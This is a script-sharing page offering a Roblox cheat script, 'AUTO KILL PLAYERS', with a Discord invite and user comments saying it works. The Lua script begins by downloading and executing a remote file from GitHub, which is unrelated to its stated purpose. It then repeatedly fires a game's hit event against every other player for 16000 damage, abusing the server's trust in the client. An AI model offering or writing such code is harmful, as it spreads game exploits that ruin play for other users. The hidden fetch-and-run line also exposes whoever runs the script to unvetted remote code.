ADVERTISEMENTREMOVE ADS
Game icon

AUTO KILL PLAYERS | OP SCRIPT XD

Script preview thumbnail
Script Preview

Description

made this script for fun in this game it just auto kill all players instantly lol anways enjoy and joinn my discorddd reeee https://discord.gg/dmyAajpVKw

Features:

  • auto kill
ADVERTISEMENTREMOVE ADS
19 Lines • 647 Bytes
Verified
Raw
loadstring(game:HttpGet("https://raw.githubusercontent.com/FlamesIsCool/FlamezHub/refs/heads/main/discordjoin.lua"))()
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer = Players.LocalPlayer
local PlayerHitEvent = ReplicatedStorage:WaitForChild("PlayerHitEvent")
while task.wait(0.1) do
for _, player in ipairs(Players:GetPlayers()) do
if player ~= LocalPlayer then
local args = {
[1] = player,
[2] = 16000
}
PlayerHitEvent:FireServer(unpack(args))
end
end
end
ADVERTISEMENTREMOVE ADS

Comments

2 comments
to add a comment
Se

Worked great

1
1
xo

Works but makes your ping go high

0
0
ADVERTISEMENTREMOVE ADS